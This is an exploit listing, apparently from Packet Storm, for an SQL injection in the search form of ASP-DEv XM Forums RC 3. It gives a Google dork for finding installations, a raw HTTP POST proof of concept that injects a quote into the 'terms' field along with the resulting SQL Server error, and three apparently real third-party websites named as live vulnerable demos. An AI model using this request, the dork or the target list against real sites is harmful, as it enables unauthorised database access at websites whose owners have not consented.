ASP-DEv XM Forums RC 3 SQL Injection

2012-08-29T00:00:00
ID PACKETSTORM:116035
Type packetstorm
Reporter Crim3R
Modified 2012-08-29T00:00:00

Description

                                        
                                            `#######################################################  
# #  
# ________ .__ __________________ #  
# \_ ___ \_______|__| _____ \_____ \______ \ #  
# / \ \/\_ __ \ |/ \ _(__ <| _/ #  
# \ \____| | \/ | Y Y \/ \ | \ #  
# \______ /|__| |__|__|_| /______ /____|_ / #  
# \/ \/ \/ \/ #   
# #  
#######################################################  
#  
#  
# Exploit Title: ASP-DEv XM Forums RC 3 Remote Post Sql Injection Vulnerability  
#  
# Google Dork: Intext:"Powered by ASP-DEv XM Forums RC 3"  
#  
# Date: 08/29/2012  
#  
# Author: Crim3R  
#  
# Site : Http://Ajaxtm.com/  
#  
# Download Link : http://www.asp-dev.com/download.asp?did=1  
#  
# Tested on: all  
#  
==================================  
  
search form in ASP-DEv is Vulnerable to sql injection  
P0C :   
HTTP HEADERS :   
Host: www.chillifarm.com  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Referer: http://www.chillifarm.com/chilli_forum/search.asp  
Cookie: TrackID=%7B54A35316%2D7519%2D405D%2D950A%2DA8CF50497150%7D; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 46  
Post Data --------------------  
terms=%27&stype=1&in=1&forum=-1&ndays=0&mname=  
  
Http response :   
  
28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f  
  
84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f   
  
D3M0 :   
  
search query => post sql injection  
  
http://www.chillifarm.com/chilli_forum/search.asp   
  
http://forums.image-src.com/search.asp  
  
http://www.df.com/Imaging/Forum/search.asp  
  
===============Crim3R@Att.Net=========  
  
[+] Greetz to All Ajaxtm Security Member  
  
Cair3x - HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook -  
S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A  
  
`